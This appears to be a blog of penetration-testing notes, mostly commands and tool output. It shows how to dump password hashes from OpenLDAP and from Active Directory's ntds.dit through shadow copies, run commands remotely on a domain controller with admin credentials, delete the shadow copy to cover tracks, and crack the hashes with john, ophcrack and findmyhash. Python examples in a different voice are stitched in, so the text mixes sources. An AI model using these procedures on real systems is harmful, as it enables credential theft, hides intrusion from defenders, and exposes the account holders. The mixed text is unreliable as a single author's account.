Monday, October 31, 2016

LDAP crypt password extraction

 if your passwords are crypt...  
 ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w badpassword \  
 -h -b "dc=my,dc=pants,dc=com" \  
 -LLL -v "" uid userPassword \  
 | ldap2pw >  
 #! /usr/bin/perl -w  
 # ldap2pw: reads ldapsearch -LLL output on stdin (or a file) and prints uid:crypthash  
 use strict;  
 use MIME::Base64;  
 
 # LDIF folds long values onto continuation lines that start with a single space;  
 # join those first, otherwise a long base64 hash (sha512crypt easily) gets cut off  
 my @lines;  
 while( <> ) {  
     chomp;  
     if( /^ (.*)/ && @lines ) { $lines[-1] .= $1; } else { push @lines, $_; }  
 }  
 
 my( $uid, $passw ) = ( '', undef );  
 for( @lines, '' ) {      # trailing '' flushes the last object, which may lack a blank line  
     if( /^\s*$/ ) {      # objects have blank lines between them  
         print "$uid:$passw\n" if defined $passw;   # only output if object has password  
         ( $uid, $passw ) = ( '', undef );  
     } elsif( /^uid: (.+)/ ) {  
         $uid = $1;  
     } elsif( /^userP\w+:: (.+)/ ) {  
         $passw = substr( decode_base64($1), 7 );   # assuming {crypt}: strip the 7-char prefix  
     }  
 }  

LDAP base64 conversion for cracking

 ldif and ldap password extraction  
 when you extract passwords from ldap, they're salted.  
 you need to convert them to their hashes.  
 why? well. because of RFC2307  
   userpasswordvalue = cleartext-password / prefix b64-hashandsalt  
   prefix    = "{" scheme "}"  
   scheme = %x30-39 / %x41-5A / %x61-7a / %x2D-2F / %x5F  
      ;0-9, A-Z, a-z, "-", ".", "/", or "_"  
   b64-hashandsalt = <base64 of hashandsalt>  
   hashandsalt = password-hash salt  
   password-hash = <digest of cleartext-password salt>  
   cleartext-password = %x00-FF  
   salt = %x00-FF  
 yes. that.  

 in a previous post i've already mentioned how to extract uids  
 and passwords into a nice long list for jtr...  
 you'll need python and the script below which will convert the list  
 line by line. it'll work for base64 passwords:  
 MD5, SHA, SHA1, SSHA, SHA256, SSHA256, &c.   
 first, do some text preparation:  
 # cut -d ":" -f1 userpassword.out > userpassword.left  
 # cut -d ":" -f2 userpassword.out > userpassword.base64  

 import binascii  
 import base64  
 import sys  
 # read in lines from the file named on the command line - and decode (python 3)  
 with open(sys.argv[1]) as f:  
     for x in f:  
         x = x.strip()  
         x += "=" * (-len(x) % 4)   # restore base64 padding in case the '=' were stripped earlier  
         try:  
             print(binascii.hexlify(base64.b64decode(x, validate=True)).decode())  
         except (binascii.Error, ValueError):  
             print("Error: " + x)  
 # ./ userpassword.base64 > userpassword.right  
 # paste -d : userpassword.left userpassword.right > userpassword.out  
 and if you can't figure out what kind of hashes you have, use hash-identifier for singletons.
 use hashid for lists.
 # hashid userpassword.right -o userpassword.hashid
 after base64 conversion, of course.  
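The RFC 2307 grammar above is the whole story of how a stored value is laid out: a scheme in braces, then base64 of the digest with the salt appended. The following is an added example, not the post's script and not part of any project: a Python 3 parser that splits a value into (scheme, digest, salt) using the digest length of each scheme, a verify() that does what the directory server does at bind time (recompute digest(candidate + salt) and compare), and a weak_reason() audit rule that flags cleartext, unsalted and DES-crypt storage. The sample entries are constructed; the {CRYPT} string is a made-up 13-character placeholder and is not verified here because that needs the platform crypt(3).

```python
import base64
import hashlib
import hmac
from typing import Optional, Tuple

# digest length in bytes per scheme; the S* variants append the salt after the digest
DIGEST_LEN = {"MD5": 16, "SMD5": 16, "SHA": 20, "SSHA": 20,
              "SHA256": 32, "SSHA256": 32, "SHA512": 64, "SSHA512": 64}
HASH_NAME = {"MD5": "md5", "SMD5": "md5", "SHA": "sha1", "SSHA": "sha1",
             "SHA256": "sha256", "SSHA256": "sha256", "SHA512": "sha512", "SSHA512": "sha512"}


def parse_userpassword(value: str) -> Tuple[str, bytes, bytes]:
    """Split an RFC 2307 userPassword value into (scheme, digest, salt).
    Per the RFC a value with no {scheme} prefix is the cleartext password itself."""
    if not value.startswith("{"):
        return "CLEARTEXT", value.encode(), b""
    scheme, _, rest = value[1:].partition("}")
    scheme = scheme.upper()
    if scheme in ("CLEARTEXT", "CRYPT"):
        return scheme, rest.encode(), b""      # crypt(3) strings carry their own salt layout
    if scheme not in DIGEST_LEN:
        raise ValueError("unsupported scheme " + scheme)
    raw = base64.b64decode(rest)
    n = DIGEST_LEN[scheme]
    if len(raw) < n:
        raise ValueError("value too short for " + scheme)
    return scheme, raw[:n], raw[n:]


def make_userpassword(scheme: str, password: str, salt: bytes = b"") -> str:
    """Build a value the way a directory server stores it: digest(password + salt), then salt."""
    h = hashlib.new(HASH_NAME[scheme], password.encode() + salt).digest()
    return "{%s}%s" % (scheme, base64.b64encode(h + salt).decode())


def verify(value: str, candidate: str) -> bool:
    """Bind-time check: recompute digest(candidate + salt) and compare in constant time."""
    scheme, digest, salt = parse_userpassword(value)
    if scheme == "CLEARTEXT":
        return hmac.compare_digest(digest, candidate.encode())
    if scheme == "CRYPT":
        raise ValueError("CRYPT needs the platform crypt(3); not handled in this example")
    h = hashlib.new(HASH_NAME[scheme], candidate.encode() + salt).digest()
    return hmac.compare_digest(h, digest)


def weak_reason(value: str) -> Optional[str]:
    """Audit rule: why this stored value is weak, or None if the scheme is acceptable."""
    scheme, digest, salt = parse_userpassword(value)
    if scheme == "CLEARTEXT":
        return "stored in cleartext"
    if scheme == "CRYPT":
        # traditional DES crypt has no $id$ prefix: 2-char salt, only 8 password chars count
        return "DES crypt" if not digest.startswith(b"$") else None
    if scheme in ("MD5", "SHA"):
        return "unsalted " + scheme
    if scheme in ("SMD5", "SSHA") and len(salt) < 4:
        return "salt shorter than 4 bytes"
    return None


# constructed sample directory entries (not real accounts or real hashes)
SAMPLE = {
    "alice": make_userpassword("SSHA", "correct horse", b"\x01\x02\x03\x04"),
    "bob":   make_userpassword("MD5", "hunter2"),
    "carol": "{CLEARTEXT}letmein",
    "dave":  "{CRYPT}abJnggxhB/yWI",      # placeholder DES-style crypt string, made up
}


def audit(entries):
    """Return {uid: reason} for every entry whose stored password scheme is weak."""
    return {uid: r for uid, v in entries.items() if (r := weak_reason(v)) is not None}


if __name__ == "__main__":
    for uid, reason in audit(SAMPLE).items():
        print(uid, "->", reason)
```

Running it lists bob, carol and dave; alice's salted SHA-1 passes the rule. The same split is what tells you which john format applies: the digest length says SHA-1 vs MD5, and a non-empty salt says the salted variant.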

Wednesday, October 26, 2016

LDAP attributes for password extraction

 for ldap attribute extraction the following are key:  
 Filter: (objectClass=*)  
 Attributes: uid, sambaLMPassword, sambaNTPassword, userPassword  
 i have access to an openldap server. yes!  
 the search DN is:  
 valid user accounts are kept:  
 retired user accounts are kept:  

 let's grab passwords...
 ldapsearch -x -D "cn=admin,dc=my,dc=pants,dc=com" -w apassword \  
 -h -b "dc=my,dc=pants,dc=com" -LLL \  
 -v "(objectClass=*)" sambaLMPassword > lmpassword
 i know that all valid accounts have this format:  
 dn: uid=username  
 some places have a different dn: than the valid logon id.  
 those can be simply the attribute uid=username  
 my script below is to slice and dice "dn: uid="  
 when doing the ldap dump, however, attributes may be juggled. more advanced  
 text sorting is required for proper formatting... i digress.  
 cp $dumporig $dump  
 sed -i '/ou=groups/d' $dump                         <-- remove groups as dumped  
 sed -i '/sambaDomainName/d' $dump                   <-- there are no passes for me here  
 sed -i 's/dn:\ cn=/dn:\ uid=/g' $dump               <-- admin has cn: as do others  
 sed -i '/^$/d' $dump                                <-- blank lines be gone  
 sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump <-- stripping dn  
 sed -i 's/ou=users,dc=my,dc=pants,dc=com//g' $dump  <-- removing dangling dn  
 sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump  <-- stripping dn  
 sed -i 's/,dc=my,dc=pants,dc=com//g' $dump          <-- removing dangling dn  
 sed -i '/dc=my/d' $dump                             <-- removing dangling dn  
 sed -i 's/dn:\ uid=//g' $dump                       <-- we only want uid  
 sed -i '/dn:\ /d' $dump                             <-- for records that only have a leading dn:  
 sed -i ':a;N;$!ba;s/\n/blast/g' $dump               <-- fun with line breaks  
 sed -i 's/userPassword::/userPassword:/g' $dump     <-- converting attribute. some are :: others :  
 sed -i 's/userPassword//g' $dump                    <-- remove the attribute name altogether; only the : remains  
 sed -i 's/blast:\ /:/g' $dump                       <-- fun  
 sed -i 's/blast/\n/g' $dump                         <-- convert fun to a new line  
 sed -i '/:/!d' $dump                                <-- no : ? go away  
 sed -i '/^:/d' $dump                                <-- start with : ? go away
 sed -i 's/=//g' $dump                               <-- remove trailing =  
 sort -u $dump > $dump.out                        <-- sort the output  
 rm $dump                                            <-- remove temp file  
for LMPassword it is a little simpler. NTPassword is the same; replace the LMPassword attribute for file processing.
 cp $dumporig $dump  
 sed -i '/ou=groups/d' $dump  
 sed -i '/sambaDomainName/d' $dump  
 sed -i '/dn:\ cn=/d' $dump  
 sed -i '/^$/d' $dump  
 sed -i '/^uid:\ /d' $dump                       <-- removing uid if we dumped it   
 sed -i 's/,ou=users,dc=my,dc=pants,dc=com//g' $dump  
 sed -i 's/,ou=yawn,dc=my,dc=pants,dc=com//g' $dump  
 sed -i '/dc=my/d' $dump  
 sed -i 's/dn:\ uid=//g' $dump  
 sed -i ':a;N;$!ba;s/\n/blast/g' $dump  
 sed -i 's/sambaLMPassword//g' $dump  
 sed -i 's/blast:\ /:/g' $dump  
 sed -i 's/blast/\n/g' $dump  
 sed -i '/:/!d' $dump  
 sort -u $dump > $dump.out  
 rm $dump  
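The sed chains above assume the dn comes first and the attributes arrive in a fixed order; as noted, attributes get juggled, long values are folded onto continuation lines, and some values come as `::` base64 while others are plain `:`. As an added example (not the post's own script, and not from any project), here is a Python 3 version of the same slice and dice that parses LDIF records properly and then pulls `uid:value` for whichever attribute you name, so the userPassword and sambaLMPassword runs are the same call. The sample LDIF is constructed; the {SSHA} string in it is the rootpw value quoted further down in this post, and the LM value is a made-up hex placeholder.

```python
import base64
import re
from typing import Dict, Iterator, List, Optional

SSHA = "{SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p"          # the rootpw value quoted in this post
ENC = base64.b64encode(SSHA.encode()).decode()           # how ldapsearch emits it: userPassword:: <b64>

# constructed ldapsearch -LLL output: attribute order differs per record, one value is
# folded onto a continuation line, one record is a group, and admin has no uid attribute
SAMPLE_LDIF = "\n".join([
    "dn: uid=alice,ou=users,dc=my,dc=pants,dc=com",
    "uid: alice",
    "sambaLMPassword: 0123456789ABCDEF0123456789ABCDEF",   # constructed, not a real LM hash
    "userPassword:: " + ENC,
    "",
    "dn: uid=bob,ou=users,dc=my,dc=pants,dc=com",
    "userPassword:: " + ENC[:20],                          # RFC 2849 folding: the rest of the
    " " + ENC[20:],                                        # value continues after a single space
    "uid: bob",
    "",
    "dn: cn=staff,ou=groups,dc=my,dc=pants,dc=com",
    "cn: staff",
    "",
    "dn: cn=admin,dc=my,dc=pants,dc=com",
    "cn: admin",
    "userPassword: " + SSHA,                               # plain ':' this time
])

ATTR_LINE = re.compile(r"^([A-Za-z][\w.;-]*)(::?) ?(.*)$")


def ldif_records(text: str) -> Iterator[Dict[str, List[str]]]:
    """Yield {attribute: [values]} per record; joins folded lines and decodes '::' base64."""
    unfolded: List[str] = []
    for line in text.splitlines():
        if line.startswith(" ") and unfolded:
            unfolded[-1] += line[1:]
        else:
            unfolded.append(line)
    rec: Dict[str, List[str]] = {}
    for line in unfolded + [""]:          # sentinel blank line flushes the last record
        if not line.strip():
            if rec:
                yield rec
            rec = {}
            continue
        m = ATTR_LINE.match(line)
        if not m:                         # comments and anything else that is not attr: value
            continue
        attr, sep, value = m.group(1).lower(), m.group(2), m.group(3)
        if sep == "::":
            value = base64.b64decode(value).decode("latin-1")
        rec.setdefault(attr, []).append(value)


def record_uid(rec: Dict[str, List[str]]) -> Optional[str]:
    """uid attribute if present, else the RDN value of the dn (so cn=admin still comes out)."""
    if rec.get("uid"):
        return rec["uid"][0]
    m = re.match(r"^[^=]+=([^,]+)", rec.get("dn", [""])[0])
    return m.group(1) if m else None


def extract(text: str, attribute: str) -> List[str]:
    """'uid:value' for each record carrying the attribute; groups and domain objects drop out."""
    out = set()
    for rec in ldif_records(text):
        uid, vals = record_uid(rec), rec.get(attribute.lower())
        if uid and vals:
            out.add("%s:%s" % (uid, vals[0]))
    return sorted(out)


if __name__ == "__main__":
    for line in extract(SAMPLE_LDIF, "userPassword"):
        print(line)
```

Because the record is parsed before anything is printed, attribute order no longer matters and the base64 padding is kept intact, which the later hex conversion step needs.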
 but... what is the rootdn's password to access the openldap server?  
 it is found here:  
 scroll down to:  
 another account worth checking is replicator, but  
 it may be restricted to certain hosts.  
 rootdn "cn=admin,dc=my,dc=pants,dc=com"  
 overlay syncprov  
 syncprov-checkpoint 100 10  
 syncprov-sessionlog 100  
 rootpw {SSHA}VDE302qCXhD2yqF/woV4XI5hJVP1ds6p  
 crack that password by placing the following in a text file, say slap.out:  
 /opt/john/john --session=ldaproot --format=salted-sha1 --wordlist=master.lst --rules=NT --fork=2 slap.out  
 * note: --format=salted-sha1-opencl may barf:  
 Build log: ptxas error  : Entry function 'sha1' uses too much shared data (0x403c bytes, 0x4000 max)  
 it is only one password...  
 if you are able to grab an ldif, things are way easier.  
 sed -e '/dn:/b' -e '/Password/b' -e d ldif > ldif.out  
 this has you searching for the strings "dn:" and "Password" and printing their lines out in that  
 order to an output file.  
 easy. then you parse away.  

password cracking post john

 post and john...   
 let's say you've cracked away and can't crack the hash.
 someone may already have for you.

 findmyhash is an automated way to search online databases:  
 # findmyhash TYPE -h "hash" -g (searches the Google)
 Do a batch job because you don't want to copy and paste
 your life away (no Google, sorry):  
 # findmyhash TYPE -f FILE   


 that's useful, but doing things with a file is the way to go.

 here's how to create a file with post-cracked john LANMAN  
 passes... the below shows what's left, does some formatting, 
 removes the first couple of fields, and dumps the type of password.  
 # john --show=LEFT --format=lm lmhash.out | grep -v "password hashes" | \  
 cut -d":" -f3 | sort -u > lmhash.only && sed -i 's/\$LM\$//g' lmhash.only  
 however, the findmyhash man pages state that for LANMAN/NT hashes  
 having both hashes is best. ophc format does this for us... 
 ophcrack files are formatted thus:
 1  23      4      5   67  
 we want columns 3 and 4.  
 note: not all active directory accounts have a stored LANMAN password. crud. 
 that's why we're using sed to remove the leading : . joy.  
 # cat nthash.oph | cut -d":" -f3,4 | sort -u > nthash.only && sed -i 's/^://' nthash.only 
 now plug it in:  
 # findmyhash LM -f nthash.only  
 yay! our passwords are all over the internets. who knew?

 a cracking interlude...

 passwords found in LDAP databases can be challenging.  
 the type can be any of: MD5, CRYPT, DES, NT, LANMAN  
 gross. just gross. but... if the passwords you're accessing are 
 from an LDAP-Samba database, get at one of those passwords and 
 you're golden. figuring out the hash type can be challenging.
 hash-identifier may be of use.
 # hash-identifier  
 place hash on HASH: line  

 and then you can use the same format as above with findmyhash.
 only, specify MD5, CRYPT...

Monday, October 24, 2016

ophcrack and jtr coexisting notes

 when using ophcrack, do not specify an lm outfile, as ntdsxtract will   
 place the lmhashes and nthashes in the same file for use by ophcrack.  
 python ~/ntdsxtract/ ~/domain.export/datatable.3 ~/domain.export/link_table.4 ~/temp \  
 --passwordhistory --passwordhashes --ntoutfile ~/domain.oph/domain-nthash.oph --pwdformat ophc --syshive ~/broadway/system  
 when running ophcrack via a cracking rig, here's the format:  
 # ophcrack -v -g -u -n 7 -l ~/oph/domain-nthash.log -o ~/oph/domain-nthash.cracked -d /usr/share/ophcrack/ \  
  -t vista_free:vista_proba_free:xp_free_fast:xp_german:vista_num:vista_special:xp_free_small \  
  -f ~/oph/domain-nthash.oph  
 -l log of work  
 -o cracked passwords. this is basically the oph file with the lanman and nt passes appended at the end.  
 -d location of rainbow tables  
 -t are the rainbow table directories  
 -f the oph hash file  
 let's say you've already run your grabbed hashes through john and want to crack the  
 leftovers via ophcrack.  
 # ./john --show=LEFT --format=nt nthash.out | grep -v "password hashes" | cut -d":" -f1,2 | \  
 sort -u > domain-nthash.sort && sed -i 's/:/::/g' domain-nthash.sort  
 # sort -u domain-nthash.oph > domain-nthash.oph-sort && mv domain-nthash.oph-sort domain-nthash.oph  
 # gawk -F:: '  
    FNR==NR {a[NR]=$1; next};                 # first file: collect the uids john could not crack  
    {b[$1]=$0};                               # second file: index each oph line by its first field  
    END{for (i in a) if (a[i] in b) print b[a[i]]}  
  ' domain-nthash.sort domain-nthash.oph | sort -u > domain-nthash.oph.sort-new && mv domain-nthash.oph.sort-new domain-nthash.oph  

Friday, October 21, 2016

jtr and wordlists notes

 # ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >> dictionaries/local-upper.lst  
 # cat local-upper.lst >> local.lst  
 if you're cracking des or nt or pretty much anything that is not solely uppercase
 and want to eventually feed it into lm brute forcing: 
 # dd if=dictionaries/local.lst of=dictionaries/local-upper.lst conv=ucase  

Thursday, October 20, 2016

dumping ad passwords and cracking with jtr

yes, some people use the euphemism "windows domain controller password audit." but, let's call it what it is: dumping ad and getting password hashes. i'm using jtr.
 on a domain Controller using a privileged account:  
 C:\ vssadmin list shadows  
 none. okay.  
 * where's ntds.dit ? take note.  
 * make a system dir  
 C:\ mkdir C:\Windows\system  
 * make a shadow copy of C:\  
 * C:\ vssadmin create shadow /for=C:  
 you should see:  
 Successfully created shadow copy for 'C:\'  
 vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool  
 (C) Copyright 2001-2005 Microsoft Corp.  
 Successfully created shadow copy for 'C:\'  
   Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}  
   Shadow Copy Volume Name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1  
 * C:\Users\administrator>vssadmin list shadows  
 vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool  
 (C) Copyright 2001-2005 Microsoft Corp.  
 Contents of shadow copy set ID: {c83ef910-aa7a-45cb-a434-b87936c864d0}  
   Contained 1 shadow copies at creation time: 10/20/2016 9:16:45 AM  
    Shadow Copy ID: {ee0afc8a-5001-48d7-b634-8d66b6450250}  
      Original Volume: (C:)\\?\Volume{b5d3ef64-5116-11e5-a5af-806e6f6e6963}\  
      Shadow Copy Volume: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1  
      Originating Machine: domain-dc1.domain  
      Service Machine: domain-dc1.domain  
      Provider: 'Microsoft Software Shadow Copy provider 1.0'  
      Type: ClientAccessible  
      Attributes: Persistent, Client-accessible, No auto release, No writers,  
 * next, copy ntds.dit from the shadow copy someplace it can be retrieved on the non-shadowed drive.  
 that would be from the shadow volume NTDS location to, say, C:\  
 C:\Users\administrator>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo  
 py1\Windows\NTDS\ntds.dit C:\  
     1 file(s) copied.  
 * copy SYSTEM hive  
 C:\Users\administrator.DEVTEST>copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCo  
 py1\Windows\System32\config\SYSTEM C:\  
     1 file(s) copied.  
 * let's cover our tracks and prevent others from grabbing dit and SYSTEM
 C:\ vssadmin delete shadows /for=C: /shadow=ee0afc8a-5001-48d7-b634-8d66b6450250 

 a linux interlude... if you have admin creds
 and do not have access to a console and do
 not want to have access to a console
 # mount -t cifs //$ -o username=domain/administrator,password=weakpassword /root/mnt 
 # apt-get install wmis
 # wmis -U DOMAIN/administrator%weakpassword // "cmd.exe /c
 vssadmin list shadows > c:\output.txt"
 # cat /root/mnt/output.txt
 look for the ShadowCopy volume; that is where you'll find ntds.dit and SYSTEM

 # wmis -U DOMAIN/administrator%weakpassword // "cmd.exe /c
 copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\ntds.dit c:\ > c:\output.txt"
 # wmis -U DOMAIN/administrator%weakpassword // "cmd.exe /c
 copy \\\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM c:\ > c:\output.txt"

 # ls /mnt
 ntds.dit SYSTEM 
 linux ubuntu/debian rig
 install base packages:
 # apt-get install cifs-utils autoconf automake autopoint libtool pkg-config  
 offline processing tools:  
 # git clone  
 # cd libesedb/  
 # ./  
 # ./  
 # ./configure  
 # make && make install  
 # ldconfig <- load library  
 # git clone  
 # git clone  
 get cracking!  
 # mount -t cifs //$ -o username=domain/administrator,password=weakpassword /root/mnt  
 # mkdir domain 
 # cp /root/mnt/SYSTEM /root/mnt/ntds.dit /root/domain/  
 # cd ~/libesedb/esedbtools  
 # ./esedbexport -t ~/ntds ~/ntds.dit  
 # ~/libesedb/esedbtools# ./esedbexport -t ~/domain ~/domain/ntds.dit  
 esedbexport 20160924  
 Opening file.  
 Exporting table 1 (MSysObjects) out of 12.  
 Exporting table 2 (MSysObjectsShadow) out of 12.  
 Exporting table 3 (MSysUnicodeFixupVer2) out of 12.  
 Exporting table 4 (datatable) out of 12.  
 Exporting table 5 (hiddentable) out of 12.  
 Exporting table 6 (link_table) out of 12.  
 Exporting table 7 (sdpropcounttable) out of 12.  
 Exporting table 8 (sdproptable) out of 12.  
 Exporting table 9 (sd_table) out of 12.  
 Exporting table 10 (MSysDefrag2) out of 12.  
 Exporting table 11 (quota_table) out of 12.  
 Exporting table 12 (quota_rebuild_progress_table) out of 12.  
 Export completed.  
 # ls ~/domain.export  
 datatable.3      <- accounts
 link_table.5     <- db links
 # python ntdsxtract/ ~/domain.export/datatable.3 ~/domain.export/link_table.5 ~/temp --passwordhistory --passwordhashes --lmoutfile ~/domain/lmhash.out --ntoutfile ~/domain/nthash.out --pwdformat john --syshive ~/domain/SYSTEM  

 what does that mean?
 command accounttable linkstable whereworkisdone wewantthemall wewanthashes wheretosendlmhash wheretosendnthash hashformat systemhive
 [+] Started at: Thu, 20 Oct 2016 17:47:21 UTC  
 [+] Started with options:  
     [-] Extracting password hashes  
     [-] LM hash output filename: /root/domain/lmhash.out  
     [-] NT hash output filename: /root/domain/nthash.out  
     [-] Hash output format: john  
 The directory (/root/temp) specified does not exists!  
 Would you like to create it? [Y/N]  
 # ls ~/domain/  
 * feed into jtr and use cracked passes to compose a wordlist suitable for nt format  
 # ./john --session=lm --format=lm --fork=2 --incremental=LM_ASCII lmhash.out  
 note: lm is not compatible with gpu cracking  
 # ./john --show lmhash.out  
 # ./john --show --format=lm lmhash.out | grep -v "password hashes" | cut -d":" -f2 | sort -u >lmcrack.txt  
 # ./john --session=nt --format=nt --fork=2 --wordlist=lmcrack.txt --rules=NT nthash.out  

solaris 11 default passwords

 from oracle support:  
 On Solaris 11 the default account for the system is (login/password): jack/jack and for the system account root/solaris ; please keep in mind that on Solaris 11 you can't longer login directly with the root account.  
 well. that's nice. that means jack, right?

Friday, October 14, 2016

dump and crack nis/nis+ password database

yeah well. that was easy.
 # ypcat passwd > <file>  
 # john <file>  
 # john --show <file>  

Thursday, October 13, 2016

afterthefact postgre metasploit user password set

 let's just say you set up metasploit with the msf user and forgot to set the password.  
 you go to msfconsole and see:  

 Failed to connect to the database: fe_sendauth: no password supplied [-] Unknown command: Failed. metasploit  

 $ sudo -u postgres psql  
 \password msf  
 set the password and quit  
 $ sudo nano -w /opt/metasploit-framework/config/database.yml  
 On the line password: supply it.  
 $ echo sigh.  

let's crack default factory-shipped hp ilo passwords with john

let's crack default ipmi passwords from hp ilo.
yes let's, shall we?
 # mkdir -p /opt/john/dictionaries  
 # cd /opt/john/dictionaries
 # crunch 8 8 0123456789 > eightnum.lst <- 890M
 # crunch 8 8 ABCDEFGHIJKLMNOPQRSTUVWXYZ > eightalpha.lst <- 1T
 # ./john --session=ipmi32 --fork=8 --format=rakp \
 --wordlist=/opt/john/dictionaries/eightnum.lst out.john  

let's do it with both wordlists.
# ls /opt/john/dictionaries/ | xargs -t -I files \  
 ./john --session=ipmi32 --wordlist=/opt/john/dictionaries/files --rules \  
 --fork=8 --format=rakp out.john  
 now you can let it run against all the numbers and all the alpha. 
 --rules will do crazy upper and lower case (just in case).   
although. you may forego using wordlists altogether if you're
doing simple alpha or num cracks.
  go to /opt/john/john.conf and add the following stanza:  
 [Incremental:UpperEight]  
 File = $JOHN/upper.chr  
 MinLen = 8  
 MaxLen = 8  
 CharCount = 26  
that uses john's uppercase alphabet chr and parses through all 8 combinations of 26 letters.  
it may take forever, but, yay.  
 # ./john --fork=8 --incremental:UpperEight --format=rakp ./out.john  

here's something for hp's default random 8-character string drawn from the 10 digits:

 [Incremental:DigitsEight]
 File = $JOHN/digits.chr    <- digits.chr, not upper.chr: upper.chr only holds the 26 letters
 MinLen = 8
 MaxLen = 8
 CharCount = 10

 # ./john --fork=8 --incremental:DigitsEight --format=rakp ./out.john  

for gpu cracking

first, always check how many gpus you have available  
 # nvidia-smi  
 0, 1 under the GPU heading means you have two.  
 when passing the command line options to john,  
 get cracking:  
 # ./john --session=ipmiopencl --format=rakp-opencl --dev=0,1 --fork=2 ./out.john  
 * this means you're calling on devices 0 & 1 (as noted in nvidia-smi) and you are   
 forking the cracking job between the two of them.  
 Using default input encoding: UTF-8  
 Loaded 245 password hashes with 245 different salts (RAKP-opencl, IPMI 2.0 RAKP (RMCP+) [HMAC-SHA1 OpenCL])  
 Remaining 116 password hashes with 116 different salts  
 Node numbers 1-2 of 2 (fork)  
 Device 1@crackingrig: Quadro NVS 295  
 Device 0@crackingrig: Quadro NVS 295  
 Press 'q' or Ctrl-C to abort, almost any other key for status  
 * if you press <enter> <enter>  
 2 0g 0:00:00:28 3/3 0g/s 27871p/s 479640c/s 479640C/s GPU:81°C batash..maglor  
 1 0g 0:00:00:28 3/3 0g/s 26870p/s 475151c/s 475151C/s GPU:77°C 123456..anitie  
 you'll see something similar to the above. notice that the GPU is not frying.  
 * nb the idea of cores does not apply to gpus, so stick to fork=2 or you might  
  have a really bad day. really. pay no attention to --list=cuda-devices showing:  
  Number of stream processors:  8 (1 x 8)   
  and the thought that it means --fork=8 per processor.   
  here are some numbers to dissuade you from that for brute-force processing:  
  0 0 0g 0:00:00:03 57.52% 1/3 (ETA: 15:30:49) 0g/s 191006p/s 191006c/s 191006C/s GPU:77°C GPU1:81°C administrator10..A3212  
  2 1 0g 0:00:00:02 74.16% 1/3 (ETA: 15:27:49) 0g/s 194691p/s 194691c/s 194691C/s GPU:78°C a5668..admior5632  
  4 4 0g 0:00:00:06 99.38% 1/3 (ETA: 15:26:34) 0g/s 50777p/s 50777c/s 50777C/s GPU:87°C administr3..a971905  
  8 5 0g 0:00:00:03 58.41% 1/3 (ETA: 15:25:17) 0g/s 25871p/s 25871c/s 25871C/s GPU:79°C 5505..A9691   
 16 5 0g 0:00:00:10 51.33% 1/3 (ETA: 15:24:10) 0g/s  3556p/s  3556c/s  3556C/s GPU:80°C A-214..Administrtor214  

Tuesday, October 11, 2016

soup to nuts install of metasploit on ubuntu 14.04 lts

 install base  
 * priv  
 nano -w /etc/ssh/sshd_config  
 ssh-keygen -t rsa -b 2048  
 apt-get update  
 apt-get upgrade  
 apt-get install build-essential libreadline-dev libssl-dev libpq5 \  
 libpq-dev libreadline5 libsqlite3-dev libpcap-dev openjdk-7-jre \  
 git-core autoconf postgresql pgadmin3 curl zlib1g-dev libxml2-dev \  
 libxslt1-dev vncviewer libyaml-dev curl zlib1g-dev ipmitool p7zip \  
 nmap tcpdump subversion cmake bison flex 
 * non-priv  
 cd ~  
 git clone git:// .rbenv  
 echo 'export PATH="$HOME/.rbenv/bin:$PATH"' >> ~/.bashrc  
 echo 'eval "$(rbenv init -)"' >> ~/.bashrc  
 exec $SHELL  
 git clone git:// ~/.rbenv/plugins/ruby-build  
 echo 'export PATH="$HOME/.rbenv/plugins/ruby-build/bin:$PATH"' >> ~/.bashrc  
 git clone git:// ~/.rbenv/plugins/rbenv-sudo  
 exec $SHELL  
 rbenv install 2.3.1  
 rbenv global 2.3.1  
 ruby -v  
 postgresql server  
 * non-priv  
 sudo -s  
 su postgres  
 cd ~  
 createuser msf -P -S -R -D  
 createdb -O msf msf  
 hashcat  (not a hot idea on a virtual machine)
 * as priv user  
 sudo apt-get install ocl-icd-libopencl1 opencl-headers clinfo  
 sudo mkdir /usr/bin/OpenCL  
 cd /opt  
 p7zip -d hashcat-3.10.7z  
 mv hashcat-3.10/ hashcat  
 cd hashcat  
 cp hashcat64.bin /usr/bin  
 ln -s /usr/bin/hashcat64.bin /usr/bin/hashcat  
 * as priv user  
 apt-get install build-essential libssl-dev yasm libgmp-dev \
 libpcap-dev libnss3-dev libkrb5-dev pkg-config libbz2-dev \
 nvidia-cuda-toolkit nvidia-opencl-dev nvidia-352 nvidia-cuda-toolkit opencl-headers <- if you have an nvidia gpu 
 fglrx-updates-dev <- if you want to use your amd gpu as an opencl device
 libopenmpi-dev openmpi-bin <- for mpi support

 * a gpu note
 lshw -C video
 apt-get install libboost-regex1.54-dev <- meh
 svn checkout rexgen
 cd rexgen/trunk/src/
 mkdir build && cd build
 cmake ..
 make  && sudo make install 

 git clone git:// -b bleeding-jumbo john 
 cd john/src 

 ./configure --enable-mpi --enable-nt-full-unicode && make -s clean && make -sj4 
 * because unicode, yes.

 ./configure --enable-cuda --enable-mpi --enable-nt-full-unicode \
 --enable-experimental-code && make -s clean && make -sj4
 * if gpu
 cd .. && mv run /opt/john 

 ** test gpu
 john --list=cuda-devices
 john --list=opencl-devices
 let's get some password lists

 cd /opt/john
 mkdir /opt/john/dictionaries
 cd /opt/john/dictionaries
 cp .. /wordlist.lst .
 wget .
 wget .
 * nb crackstation may show up as a binary file. i'd suggest after extraction:
 strings crackstation-human-only.lst > crackstation.txt

 fix the environment
 add /opt/john to PATH
 add line JOHN="/opt/john/"

 ** odds and sods
 john --list=formats --format=opencl
 john --list=formats --format=cuda

 john ~/shadow <- openmp crack session
 john --format=sha512crypt-opencl ~/shadow <- opencl session
 john --format=sha512crypt-cuda ~/shadow <- cuda session 
 ** add'l chr files
 * nb

 * priv user  
